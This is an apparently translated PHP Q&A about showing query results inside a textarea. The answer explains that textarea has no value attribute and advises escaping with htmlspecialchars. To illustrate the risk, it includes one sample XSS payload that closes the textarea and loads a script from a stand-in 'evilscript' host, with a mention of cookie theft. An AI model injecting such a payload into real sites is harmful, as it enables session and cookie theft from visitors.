在 textarea 中显示 PHP 查询结果 [英] Display PHP query result in textarea
问题描述
我在这里遇到了一个小问题,我正在尝试制作一个带有编辑按钮的新闻系统,一切都很好,但是我遇到了textarea"的问题,我可以在输入上显示结果但是当我尝试在 textarea 中显示它们时,它不会,看:
I'm having a little problem over here, I'm trying to make a news system with an edit button, it's all going great but I'm having problems with the "textarea", I can display the results on inputs but when I try to display them in a textarea it wont, look:
此代码完美运行:
<input name="txt_02" size="87" maxlength="100" id="txt_Resumen" maxlength="140" value="<?php echo $not_Resumen?>"/>
这不会:
<textarea name="txt_descripcion" cols="66" rows="10" id="txt_descripcion" value="<?php echo $not_Contenido ?>">
</textarea>
我在 textarea 中尝试了 $not_Resumen 和其他的,但它不起作用,textarea 会在没有文本的情况下显示为空,这应该是我犯的一个小错误,但我找不到它.谢谢.
I tried with $not_Resumen and other ones in the textarea and it doesn't work, the textarea would show up empty without the text, it should be a little mistake I'm making but I can't find it. Thanks.
推荐答案
只要把它放在><
中,就有无值属性:
Just put it within ><
, there's no value attribute:
<textarea name="txt_descripcion" cols="66" rows="10" id="txt_descripcion"><?php echo htmlspecialchars($not_Contenido);?></textarea>
您还应该使用 htmlspecialchars
以便在 $not_Contenido
包含 .
You should also use htmlspecialchars
so that the textarea will not break if $not_Contenido
contains </textarea>
.
有时会忽略这一点,但如果 $not_Contenido
包含类似:
This is sometimes overlooked, but if $not_Contenido
contained something like:
</textarea><script src="http://remotedomain.com/evilscript.js"></script>
攻击者可以运行他们想要的任何东西,您的所有客户端都会下载并在您的网站上运行脚本.一种常见的攻击是向他们的域发送 cookie.
An attacker can run anything they want, and all your clients will download and run the script on your website. A common attack would be sending cookies to their domain.
这篇关于在 textarea 中显示 PHP 查询结果的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!